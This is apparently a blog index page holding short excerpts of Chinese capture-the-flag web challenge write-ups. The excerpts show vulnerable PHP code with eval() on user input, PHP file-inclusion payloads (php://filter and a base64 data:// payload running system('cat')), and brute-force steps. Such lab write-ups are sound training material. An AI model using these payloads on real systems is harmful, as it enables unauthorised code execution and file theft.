摘要:        
web 89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no     阅读全文
posted @ 2020-10-11 18:01
NPFS
阅读(5760)
评论(0)
推荐(0)
        
            
        
        
摘要:        
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQg    阅读全文
posted @ 2020-10-11 14:53
NPFS
阅读(4000)
评论(7)
推荐(1)
        
            
        
        
摘要:        
命令执行小技巧 可以先看下这篇文章,方便接下来的做题 web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{    阅读全文
posted @ 2020-10-11 14:50
NPFS
阅读(14904)
评论(0)
推荐(1)
        
            
        
        
摘要:        
web21 先随便输入账号密码,抓包 base64解密,可以发现账号密码的形式为 账号:密码,这里我们采用 Custom iterator进行爆破 使用方法可参考:Custom iterator的使用 爆破即可得到flag web22 子域名爆破 flag.ctfer.com web23 <?php    阅读全文
posted @ 2020-10-11 14:48
NPFS
阅读(4709)
评论(3)
推荐(1)
        
            
        
        
摘要:        
Web1 右键 查看源码得到flag Web2 Ctrl+U或者 view-source:http://网站/ 查看源码得到flag Web3 响应头获取flag 拿burpsuite抓包看响应头,或者之间谷歌F12 network看响应头 Web4 访问 robots.txt http://url    阅读全文
posted @ 2020-10-11 14:47
NPFS
阅读(3877)
评论(0)
推荐(1)
        

 
         浙公网安备 33010602011771号
浙公网安备 33010602011771号